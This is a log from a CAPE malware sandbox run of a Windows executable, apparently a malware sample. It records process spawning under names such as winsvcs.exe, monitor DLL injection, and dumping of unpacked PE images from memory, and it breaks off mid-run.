Analysis

Category Package Started Completed Duration Options Log
FILE Extraction 2019-01-10 03:39:35 2019-01-10 03:43:25 230 seconds Show Options Show Log
route = internet
procdump = 0
2019-01-10 03:39:36,015 [root] INFO: Date set to: 01-10-19, time set to: 03:39:36, timeout set to: 200
2019-01-10 03:39:36,015 [root] DEBUG: Starting analyzer from: C:\chdswdpfa
2019-01-10 03:39:36,015 [root] DEBUG: Storing results at: C:\EatnTMoHS
2019-01-10 03:39:36,030 [root] DEBUG: Pipe server name: \\.\PIPE\TEtoQNCa
2019-01-10 03:39:36,030 [root] INFO: Analysis package "Extraction" has been specified.
2019-01-10 03:39:36,421 [root] DEBUG: Started auxiliary module Browser
2019-01-10 03:39:36,467 [root] DEBUG: Started auxiliary module Curtain
2019-01-10 03:39:36,467 [modules.auxiliary.digisig] INFO: Skipping authenticode validation, signtool.exe was not found in bin/
2019-01-10 03:39:36,467 [root] DEBUG: Started auxiliary module DigiSig
2019-01-10 03:39:36,467 [root] DEBUG: Started auxiliary module Disguise
2019-01-10 03:39:36,467 [root] DEBUG: Started auxiliary module Human
2019-01-10 03:39:36,483 [root] DEBUG: Started auxiliary module Screenshots
2019-01-10 03:39:36,483 [root] DEBUG: Started auxiliary module Sysmon
2019-01-10 03:39:36,483 [root] DEBUG: Started auxiliary module Usage
2019-01-10 03:39:36,483 [root] INFO: Analyzer: DLL set to Extraction.dll from package modules.packages.Extraction
2019-01-10 03:39:36,483 [root] INFO: Analyzer: Package modules.packages.Extraction does not specify a DLL_64 option
2019-01-10 03:39:36,670 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\BdTTBslVE5X4r.exe" with arguments "" with pid 2952
2019-01-10 03:39:36,670 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:39:36,670 [lib.api.process] INFO: 32-bit DLL to inject is C:\chdswdpfa\dll\OwfFKZsM.dll, loader C:\chdswdpfa\bin\oXdzSeo.exe
2019-01-10 03:39:36,686 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2952
2019-01-10 03:39:38,697 [lib.api.process] INFO: Successfully resumed process with pid 2952
2019-01-10 03:39:38,697 [root] INFO: Added new process to list with pid: 2952
2019-01-10 03:39:38,744 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:39:38,744 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:39:38,744 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:39:38,776 [root] INFO: Monitor successfully loaded in process with pid 2952.
2019-01-10 03:39:44,720 [root] DEBUG: ProtectionHandler: Address: 0x51de28, RegionSize: 0x443a
2019-01-10 03:39:44,720 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x51de28
2019-01-10 03:39:44,720 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x51de28, AllocationSize: 0x443a, ThreadId: 0xb8c
2019-01-10 03:39:44,720 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x51de28 and Type=0x0.
2019-01-10 03:39:44,720 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x51de28, size 0 with Callback 0x74492ea0, ThreadHandle = 0xac.
2019-01-10 03:39:44,720 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x51de28
2019-01-10 03:39:44,736 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x51de28
2019-01-10 03:39:44,736 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x51de28.
2019-01-10 03:39:44,736 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x4f0000, size 0x32262).
2019-01-10 03:39:44,736 [root] DEBUG: DumpPEsInRange: Scanning range 0x4f0000 - 0x522262.
2019-01-10 03:39:44,736 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x4f0000-0x522262.
2019-01-10 03:39:44,736 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\chdswdpfa\CAPE\2952_73644391010412019
2019-01-10 03:39:44,736 [root] INFO: Added new CAPE file to list with path: C:\chdswdpfa\CAPE\2952_73644391010412019
2019-01-10 03:39:44,736 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x51de28 - 0x522262.
2019-01-10 03:39:44,736 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x51de28.
2019-01-10 03:39:44,736 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x4f0000.
2019-01-10 03:39:44,736 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:39:44,736 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:39:44,736 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:39:44,736 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:39:44,736 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:39:44,736 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:39:44,736 [root] DEBUG: DumpProcess: Module entry point VA is 0x40612b
2019-01-10 03:39:44,750 [root] DEBUG: savePeFileToDisk: Name clash, trying to obtain new name...
2019-01-10 03:39:44,750 [root] INFO: Added new CAPE file to list with path: C:\chdswdpfa\CAPE\2952_75144391010412019
2019-01-10 03:39:44,750 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:39:44,750 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:39:44,750 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:39:44,750 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:39:44,828 [root] INFO: Disabling sleep skipping.
2019-01-10 03:39:53,003 [root] INFO: Announced 32-bit process name: winsvcs.exe pid: 2908
2019-01-10 03:39:53,003 [root] INFO: Added new process to list with pid: 2908
2019-01-10 03:39:53,003 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:39:53,003 [lib.api.process] INFO: 32-bit DLL to inject is C:\chdswdpfa\dll\OwfFKZsM.dll, loader C:\chdswdpfa\bin\oXdzSeo.exe
2019-01-10 03:39:53,003 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2908
2019-01-10 03:39:53,019 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:39:53,019 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:39:53,019 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:39:53,019 [root] INFO: Disabling sleep skipping.
2019-01-10 03:39:53,019 [root] INFO: Monitor successfully loaded in process with pid 2908.
2019-01-10 03:39:53,533 [root] INFO: Notified of termination of process with pid 2952.
2019-01-10 03:39:53,940 [root] INFO: Process with pid 2952 has terminated
2019-01-10 03:39:58,790 [root] DEBUG: ProtectionHandler: Address: 0x4eddd0, RegionSize: 0x443a
2019-01-10 03:39:58,790 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x4eddd0
2019-01-10 03:39:58,790 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x4eddd0, AllocationSize: 0x443a, ThreadId: 0xb64
2019-01-10 03:39:58,790 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x4eddd0 and Type=0x0.
2019-01-10 03:39:58,822 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x4eddd0, size 0 with Callback 0x74492ea0, ThreadHandle = 0xac.
2019-01-10 03:39:58,838 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x4eddd0
2019-01-10 03:39:58,838 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x4eddd0
2019-01-10 03:39:58,838 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x4eddd0.
2019-01-10 03:39:58,838 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x4c0000, size 0x3220a).
2019-01-10 03:39:58,868 [root] DEBUG: DumpPEsInRange: Scanning range 0x4c0000 - 0x4f220a.
2019-01-10 03:39:58,868 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x4c0000-0x4f220a.
2019-01-10 03:39:58,868 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\chdswdpfa\CAPE\2908_86958391010412019
2019-01-10 03:39:58,900 [root] INFO: Added new CAPE file to list with path: C:\chdswdpfa\CAPE\2908_86958391010412019
2019-01-10 03:39:58,900 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x4eddd0 - 0x4f220a.
2019-01-10 03:39:58,915 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x4eddd0.
2019-01-10 03:39:58,915 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x4c0000.
2019-01-10 03:39:58,931 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:39:58,931 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:39:58,947 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:39:58,947 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:39:58,947 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:39:58,947 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:39:58,963 [root] DEBUG: DumpProcess: Module entry point VA is 0x40612b
2019-01-10 03:39:58,977 [root] INFO: Added new CAPE file to list with path: C:\chdswdpfa\CAPE\2908_96358391010412019
2019-01-10 03:39:58,977 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:39:58,977 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:39:58,977 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:39:58,977 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:40:22,065 [root] INFO: Announced 32-bit process name: 3895820593.exe pid: 2776
2019-01-10 03:40:22,065 [root] INFO: Added new process to list with pid: 2776
2019-01-10 03:40:22,065 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:40:22,065 [lib.api.process] INFO: 32-bit DLL to inject is C:\chdswdpfa\dll\OwfFKZsM.dll, loader C:\chdswdpfa\bin\oXdzSeo.exe
2019-01-10 03:40:22,065 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2776
2019-01-10 03:40:22,144 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:40:22,160 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x1f0000
2019-01-10 03:40:22,160 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:40:22,176 [root] INFO: Disabling sleep skipping.
2019-01-10 03:40:22,190 [root] INFO: Monitor successfully loaded in process with pid 2776.
2019-01-10 03:40:22,362 [root] DEBUG: ProtectionHandler: Address: 0x51d9d0, RegionSize: 0x43d1
2019-01-10 03:40:22,362 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x51d9d0
2019-01-10 03:40:22,362 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x51d9d0, AllocationSize: 0x43d1, ThreadId: 0xadc
2019-01-10 03:40:22,378 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x51d9d0 and Type=0x0.
2019-01-10 03:40:22,378 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x51d9d0, size 0 with Callback 0x74492ea0, ThreadHandle = 0xac.
2019-01-10 03:40:22,394 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x51d9d0
2019-01-10 03:40:22,410 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x51d9d0
2019-01-10 03:40:22,424 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x51d9d0.
2019-01-10 03:40:22,424 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x4f0000, size 0x31da1).
2019-01-10 03:40:22,456 [root] DEBUG: DumpPEsInRange: Scanning range 0x4f0000 - 0x521da1.
2019-01-10 03:40:22,456 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x4f0000-0x521da1.
2019-01-10 03:40:22,487 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\chdswdpfa\CAPE\2776_45622401010412019
2019-01-10 03:40:22,487 [root] INFO: Added new CAPE file to list with path: C:\chdswdpfa\CAPE\2776_45622401010412019
2019-01-10 03:40:22,487 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x51d9d0 - 0x521da1.
2019-01-10 03:40:22,487 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x51d9d0.
2019-01-10 03:40:22,487 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x4f0000.
2019-01-10 03:40:22,487 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:40:22,487 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:40:22,487 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:40:22,519 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:40:22,519 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:40:22,519 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:40:22,519 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:40:22,533 [root] INFO: Added new CAPE file to list with path: C:\chdswdpfa\CAPE\2776_51922401010412019
2019-01-10 03:40:22,533 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:40:22,549 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:40:22,549 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:40:22,549 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:40:24,671 [root] INFO: Announced 32-bit process name: winsvcs.exe pid: 3068
2019-01-10 03:40:24,671 [root] INFO: Added new process to list with pid: 3068
2019-01-10 03:40:24,671 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:40:24,687 [lib.api.process] INFO: 32-bit DLL to inject is C:\chdswdpfa\dll\OwfFKZsM.dll, loader C:\chdswdpfa\bin\oXdzSeo.exe
2019-01-10 03:40:24,717 [root] INFO: Announced 32-bit process name: 3180725230.exe pid: 2128
2019-01-10 03:40:24,717 [root] INFO: Added new process to list with pid: 2128
2019-01-10 03:40:24,717 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 3068
2019-01-10 03:40:24,717 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:40:24,717 [lib.api.process] INFO: 32-bit DLL to inject is C:\chdswdpfa\dll\OwfFKZsM.dll, loader C:\chdswdpfa\bin\oXdzSeo.exe
2019-01-10 03:40:24,717 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2128
2019-01-10 03:40:24,717 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:40:24,733 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:40:24,733 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:40:24,733 [root] INFO: Disabling sleep skipping.
2019-01-10 03:40:24,733 [root] INFO: Monitor successfully loaded in process with pid 3068.
2019-01-10 03:40:24,733 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:40:24,780 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x270000
2019-01-10 03:40:24,828 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:40:24,858 [root] INFO: Disabling sleep skipping.
2019-01-10 03:40:24,874 [root] INFO: Monitor successfully loaded in process with pid 2128.
2019-01-10 03:40:24,951 [root] DEBUG: ProtectionHandler: Address: 0x62e168, RegionSize: 0x43d1
2019-01-10 03:40:24,999 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x62e168
2019-01-10 03:40:25,046 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x62e168, AllocationSize: 0x43d1, ThreadId: 0x538
2019-01-10 03:40:25,140 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x62e168 and Type=0x0.
2019-01-10 03:40:25,140 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x62e168, size 0 with Callback 0x74492ea0, ThreadHandle = 0xac.
2019-01-10 03:40:25,186 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x62e168
2019-01-10 03:40:25,186 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x62e168
2019-01-10 03:40:25,233 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x62e168.
2019-01-10 03:40:25,233 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x600000, size 0x32539).
2019-01-10 03:40:25,233 [root] INFO: Notified of termination of process with pid 2776.
2019-01-10 03:40:25,233 [root] DEBUG: DumpPEsInRange: Scanning range 0x600000 - 0x632539.
2019-01-10 03:40:25,233 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x600000-0x632539.
2019-01-10 03:40:25,233 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\chdswdpfa\CAPE\3068_23325401010412019
2019-01-10 03:40:25,233 [root] INFO: Added new CAPE file to list with path: C:\chdswdpfa\CAPE\3068_23325401010412019
2019-01-10 03:40:25,233 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x62e168 - 0x632539.
2019-01-10 03:40:25,249 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x62e168.
2019-01-10 03:40:25,249 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x600000.
2019-01-10 03:40:25,249 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:40:25,249 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:40:25,249 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:40:25,249 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:40:25,249 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:40:25,249 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:40:25,249 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:40:25,263 [root] INFO: Added new CAPE file to list with path: C:\chdswdpfa\CAPE\3068_24925401010412019
2019-01-10 03:40:25,263 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:40:25,263 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:40:25,263 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:40:25,263 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:40:25,404 [root] INFO: Process with pid 2776 has terminated
2019-01-10 03:40:32,611 [root] INFO: Announced 32-bit process name: 3971618177.exe pid: 2936
2019-01-10 03:40:32,690 [root] INFO: Added new process to list with pid: 2936
2019-01-10 03:40:32,783 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:40:32,954 [lib.api.process] INFO: 32-bit DLL to inject is C:\chdswdpfa\dll\OwfFKZsM.dll, loader C:\chdswdpfa\bin\oXdzSeo.exe
2019-01-10 03:40:33,079 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2936
2019-01-10 03:40:33,298 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:40:33,438 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:40:33,486 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:40:33,486 [root] INFO: Disabling sleep skipping.
2019-01-10 03:40:33,486 [root] INFO: Monitor successfully loaded in process with pid 2936.
2019-01-10 03:40:33,812 [root] DEBUG: ProtectionHandler: Address: 0x8dd9d0, RegionSize: 0x43d1
2019-01-10 03:40:33,812 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x8dd9d0
2019-01-10 03:40:33,812 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x8dd9d0, AllocationSize: 0x43d1, ThreadId: 0xb7c
2019-01-10 03:40:33,812 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x8dd9d0 and Type=0x0.
2019-01-10 03:40:33,812 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x8dd9d0, size 0 with Callback 0x74492ea0, ThreadHandle = 0xac.
2019-01-10 03:40:33,812 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x8dd9d0
2019-01-10 03:40:33,828 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x8dd9d0
2019-01-10 03:40:33,844 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x8dd9d0.
2019-01-10 03:40:33,844 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x8b0000, size 0x31da1).
2019-01-10 03:40:33,844 [root] DEBUG: DumpPEsInRange: Scanning range 0x8b0000 - 0x8e1da1.
2019-01-10 03:40:33,844 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x8b0000-0x8e1da1.
2019-01-10 03:40:33,859 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\chdswdpfa\CAPE\2936_84433401010412019
2019-01-10 03:40:33,859 [root] INFO: Added new CAPE file to list with path: C:\chdswdpfa\CAPE\2936_84433401010412019
2019-01-10 03:40:33,859 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x8dd9d0 - 0x8e1da1.
2019-01-10 03:40:33,859 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x8dd9d0.
2019-01-10 03:40:33,859 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x8b0000.
2019-01-10 03:40:33,859 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:40:33,875 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:40:33,875 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:40:33,875 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:40:33,875 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:40:33,875 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:40:33,875 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:40:33,891 [root] INFO: Added new CAPE file to list with path: C:\chdswdpfa\CAPE\2936_87633401010412019
2019-01-10 03:40:33,907 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:40:33,907 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:40:33,907 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:40:33,907 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:40:34,796 [root] INFO: Process with pid 3068 has terminated
2019-01-10 03:40:35,622 [modules.auxiliary.human] INFO: Found button "Close the program", clicking it
2019-01-10 03:40:35,950 [root] INFO: Announced 32-bit process name: winsvcs.exe pid: 2744
2019-01-10 03:40:35,950 [root] INFO: Added new process to list with pid: 2744
2019-01-10 03:40:35,950 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:40:35,950 [lib.api.process] INFO: 32-bit DLL to inject is C:\chdswdpfa\dll\OwfFKZsM.dll, loader C:\chdswdpfa\bin\oXdzSeo.exe
2019-01-10 03:40:35,966 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2744
2019-01-10 03:40:35,966 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:40:35,982 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:40:35,982 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:40:35,982 [root] INFO: Disabling sleep skipping.
2019-01-10 03:40:35,996 [root] INFO: Monitor successfully loaded in process with pid 2744.
2019-01-10 03:40:36,246 [root] DEBUG: ProtectionHandler: Address: 0x5fe168, RegionSize: 0x43d1
2019-01-10 03:40:36,246 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x5fe168
2019-01-10 03:40:36,246 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x5fe168, AllocationSize: 0x43d1, ThreadId: 0xa48
2019-01-10 03:40:36,262 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x5fe168 and Type=0x0.
2019-01-10 03:40:36,262 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x5fe168, size 0 with Callback 0x74492ea0, ThreadHandle = 0xac.
2019-01-10 03:40:36,262 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x5fe168
2019-01-10 03:40:36,278 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x5fe168
2019-01-10 03:40:36,278 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x5fe168.
2019-01-10 03:40:36,278 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x5d0000, size 0x32539).
2019-01-10 03:40:36,278 [root] DEBUG: DumpPEsInRange: Scanning range 0x5d0000 - 0x602539.
2019-01-10 03:40:36,293 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x5d0000-0x602539.
2019-01-10 03:40:36,293 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\chdswdpfa\CAPE\2744_29436401010412019
2019-01-10 03:40:36,309 [root] INFO: Added new CAPE file to list with path: C:\chdswdpfa\CAPE\2744_29436401010412019
2019-01-10 03:40:36,325 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x5fe168 - 0x602539.
2019-01-10 03:40:36,325 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x5fe168.
2019-01-10 03:40:36,325 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x5d0000.
2019-01-10 03:40:36,325 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:40:36,325 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:40:36,325 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:40:36,325 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:40:36,325 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:40:36,339 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:40:36,339 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:40:36,355 [root] INFO: Added new CAPE file to list with path: C:\chdswdpfa\CAPE\2744_34036401010412019
2019-01-10 03:40:36,355 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:40:36,355 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:40:36,355 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:40:36,355 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:40:36,480 [root] INFO: Notified of termination of process with pid 2936.
2019-01-10 03:40:36,823 [root] INFO: Process with pid 2936 has terminated
2019-01-10 03:40:43,532 [root] INFO: Announced 32-bit process name: 1015321578.exe pid: 2612
2019-01-10 03:40:43,594 [root] INFO: Added new process to list with pid: 2612
2019-01-10 03:40:43,703 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:40:43,875 [lib.api.process] INFO: 32-bit DLL to inject is C:\chdswdpfa\dll\OwfFKZsM.dll, loader C:\chdswdpfa\bin\oXdzSeo.exe
2019-01-10 03:40:43,983 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2612
